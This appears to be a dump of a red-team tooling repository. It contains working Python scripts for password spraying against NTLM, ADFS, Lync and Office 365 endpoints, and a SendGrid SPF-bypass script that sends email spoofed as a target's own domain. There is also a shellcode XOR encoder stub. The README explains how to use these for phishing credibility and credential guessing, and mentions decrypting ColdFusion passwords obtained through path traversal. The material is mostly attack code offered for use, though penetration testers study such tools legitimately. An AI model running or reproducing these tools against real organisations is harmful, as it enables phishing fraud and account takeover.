├── kill.exe ├── CFMX6Decryptor.jar ├── kill.cs ├── simple-c-xor-encoder.c ├── sendgrid-spf-bypass.py ├── adfs-spray.py ├── password-spray.py └── README.md /kill.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamScripts/HEAD/kill.exe -------------------------------------------------------------------------------- /CFMX6Decryptor.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Mr-Un1k0d3r/RedTeamScripts/HEAD/CFMX6Decryptor.jar -------------------------------------------------------------------------------- /kill.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | 4 | namespace kill 5 | { 6 | class Program 7 | { 8 | static void Main(string[] args) 9 | { 10 | foreach (var process in Process.GetProcessesByName(args[0])) 11 | { 12 | Console.WriteLine("killing {0} {1}", process.ProcessName, process.Id); 13 | process.Kill(); 14 | } 15 | } 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /simple-c-xor-encoder.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() { 4 | 5 | DWORD key = 0x10101010; 6 | DWORD dwSize = 16; 7 | CHAR *shellcode = GlobalAlloc(GPTR, dwSize); 8 | strcpy(shellcode, "AAAABBBBCCCCDDDD\x00"); 9 | 10 | DWORD *current; 11 | int i = 0; 12 | for(i; i < dwSize / 4; i++) { 13 | current = (DWORD*)shellcode; 14 | *current = *current ^ key; 15 | shellcode += 4; 16 | } 17 | shellcode -= dwSize; 18 | 19 | // print test 20 | for(i = 0; i < dwSize; i++) { 21 | printf("\\x%02x", shellcode[i]); 22 | } 23 | 24 | // execute shellcode() 25 | GlobalFree(shellcode); 26 | return 0; 27 | } 28 | -------------------------------------------------------------------------------- /sendgrid-spf-bypass.py: 
-------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | 4 | def format_body(source, to, subject, data): 5 | output = "From:%s\r\nTo:%s\r\nSubject:%s\r\n\r\n%s.\r\n\r\n" % (source, to, subject, data) 6 | return output 7 | 8 | if __name__ == "__main__": 9 | 10 | print "SendGrid SPF Bypass Mr.Un1k0d3r & Tazz0 RingZer0 Team\r\n" 11 | if len(sys.argv) < 6: 12 | print "Usage: %s apikey source destination subject emailfile" % sys.argv[0] 13 | exit(0) 14 | 15 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 | s.connect(("smtp.sendgrid.net", 25)) 17 | 18 | s.recv(1024) 19 | s.send("AUTH LOGIN\r\n") 20 | s.recv(1024) 21 | s.send("YXBpa2V5\r\n") 22 | s.recv(1024) 23 | s.send("%s\r\n" % sys.argv[1]) 24 | auth = s.recv(1024) 25 | if auth.find("235 Authentication successful") == -1: 26 | print "Auth failed" 27 | sys.exit(0) 28 | print auth.strip() 29 | 30 | s.send("mail from:%s\r\n" % sys.argv[2]) 31 | print s.recv(1024).strip() 32 | s.send("rcpt to:%s\r\n" % sys.argv[3]) 33 | print s.recv(1024).strip() 34 | s.send("DATA\r\n") 35 | body = format_body(sys.argv[2], sys.argv[3], sys.argv[4], open(sys.argv[5], "rb").read()) 36 | s.send(body) 37 | s.close() 38 | print "[+] Completed" 39 | -------------------------------------------------------------------------------- /adfs-spray.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | import urllib 3 | import sys 4 | 5 | 6 | def send_request(url, username, password): 7 | print "Trying username %s" % username 8 | 9 | request = urllib2.Request("%s/adfs/ls/?client-request-id=&wa=wsignin1.0&wtrealm=%s&wctx=cbcxt=&username=%s&mkt=&lc=" % (url, urllib.quote("urn:federation:MicrosoftOnline"), urllib.quote(username))) 10 | request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0") 11 | request.add_header("Accept", 
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8") 12 | try: 13 | response = urllib2.urlopen(request, "UserName=%s&Password=%s&AuthMethod=FormsAuthentication" % (urllib.quote(username), urllib.quote(password))) 14 | if response.code == 302: 15 | print "%s password is %s" % (username, password) 16 | print response.read() 17 | except: 18 | pass 19 | 20 | if __name__ == "__main__": 21 | 22 | if len(sys.argv) < 3: 23 | print "Usage %s url username-list password" % sys.argv[0] 24 | exit(0) 25 | 26 | for username in open(sys.argv[2], "rb").readlines(): 27 | send_request(sys.argv[1], username, sys.argv[3]) 28 | -------------------------------------------------------------------------------- /password-spray.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | import requests 4 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 5 | from requests_ntlm import HttpNtlmAuth 6 | 7 | VERSION = "1.1" 8 | 9 | def send_request(username, password, url, domain): 10 | 11 | if domain == "": 12 | username = "%s" % (username) 13 | else: 14 | username = "%s\\%s" % (domain, username) 15 | 16 | print "Trying user %s" % (username) 17 | try: 18 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 19 | req = requests.get(url, auth = HttpNtlmAuth(username, password), headers = {'User-Agent': 'Microsoft'}, verify=False) 20 | if not req.status_code == 401: 21 | print "User %s password is %s" % (username, password) 22 | except: 23 | print sys.exc_info()[0] 24 | 25 | if __name__ == "__main__": 26 | print "PasswordSpraying v%s\nWith Love Mr.Un1k0d3r RingZer0 Team\n-----------------------------------\n\n" % VERSION 27 | if len(sys.argv) < 5: 28 | print "Usage: %s [user list] [domain] [url] [password]" % sys.argv[0] 29 | sys.exit(0) 30 | 31 | domain = sys.argv[2] 32 | url = sys.argv[3] 33 | password = sys.argv[4] 34 | print "Spraying password %s against %s using domain 
%s" % (password, url, domain) 35 | for email in open(sys.argv[1], "rb").readlines(): 36 | send_request(email.strip(), password, url, domain) 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RedTeamScripts 2 | Repository with various Red Team scripts. 3 | 4 | # kill.exe 5 | 6 | Performing all kinds of activities during a red team and you have several processes running that you don't want to close manually? kill.exe is for you. Copy it into `C:\Windows\` 7 | and simply call it with the process name you want to kill. 8 | 9 | ``` 10 | >kill mspaint 11 | killing mspaint 16524 12 | killing mspaint 5284 13 | killing mspaint 8568 14 | killing mspaint 32244 15 | killing mspaint 18908 16 | killing mspaint 12600 17 | killing mspaint 37444 18 | killing mspaint 20492 19 | killing mspaint 36092 20 | killing mspaint 3908 21 | killing mspaint 30980 22 | killing mspaint 37252 23 | killing mspaint 27576 24 | ``` 25 | 26 | # SendGrid SPF bypass 27 | 28 | Clients that use SendGrid to send email need to add 167.89.0.0/17 to their SPF record to allow SendGrid to send email on their behalf. This introduces a design flaw that can be leveraged to bypass SPF. 29 | 30 | How to: 31 | * Register an account on sendgrid 32 | * Get your API key 33 | * Send email on behalf of your target 34 | 35 | Why does it work? The SendGrid subnet is part of your target's SPF record, which means that SendGrid is trusted to send emails on their behalf. Since your account is using SendGrid servers, you are part of the whitelist too :) 36 | 37 | This means that from a Red Team perspective you can send email to your target claiming to be from their own mail domain, or send email on their behalf to another organization. 38 | 39 | This is a great way to add credibility to your phishing campaign since you can spoof their domain. 
40 | 41 | #### Is your target vulnerable 42 | 43 | Simply take a look at their DNS TXT record and search for the subnet 167.89.0.0/17. If it's present, you are all set. 44 | 45 | #### Usage 46 | 47 | ``` 48 | Usage: sendgrid-spf-bypass.py apikey source destination subject emailfile 49 | 50 | python sendgrid-spf-bypass.py apikey ceo@target.corp victim@target.corp "Legitimate email" my-email.txt 51 | ``` 52 | 53 | The `emailfile` parameter should be the path to a text file that contains your email. For now the tool only supports text messages; I will improve it in the future. 54 | 55 | # Password spraying 56 | 57 | Install the following dependencies 58 | ``` 59 | pip install requests_ntlm 60 | pip install requests 61 | ``` 62 | 63 | ``` 64 | $ python password-spray.py 65 | PasswordSpraying v1.0 66 | 67 | Usage: %s [user list] [domain] [url] [password] 68 | 69 | $ python password-spray.py users.txt RINGZER0 https://lyncweb.ringzer0team.com/abs/ Summer2018 70 | ``` 71 | 72 | Note that various endpoints can be used to validate the user credentials. The subdomain for Lync and on-premises OWA may be different. Use the autodiscover feature to retrieve the right URL for your target: 73 | * Lync (https://lyncweb.target.com/abs/) 74 | * Office 365 (https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml) (use email instead of DOMAIN\USER format) 75 | * On-premises OWA (https://mail.target.com/EWS/Exchange.asmx) 76 | 77 | There are several other URLs that can be used for Lync & on-premises OWA. 78 | 79 | # CFMX6Decryptor 80 | 81 | Some people still live in the past. In 2018 we still find ColdFusion MX 6 publicly exposed. This script may help someone retrieve the plaintext version of the password that can be extracted through the well-known path traversal that affected ColdFusion. 82 | 83 | ``` 84 | $ java -jar CFMX6Decryptor.jar 85 | ColdFusion MX6 Password decryptor. 
86 | Author Mr.Un1k0d3r & Psychan RingZer0 Team 2014 87 | 88 | Usage: DecryptCFPassword [uuencoded password] 89 | ``` 90 | 91 | # Credit 92 | Mr.Un1k0d3r RingZer0 Team 93 | --------------------------------------------------------------------------------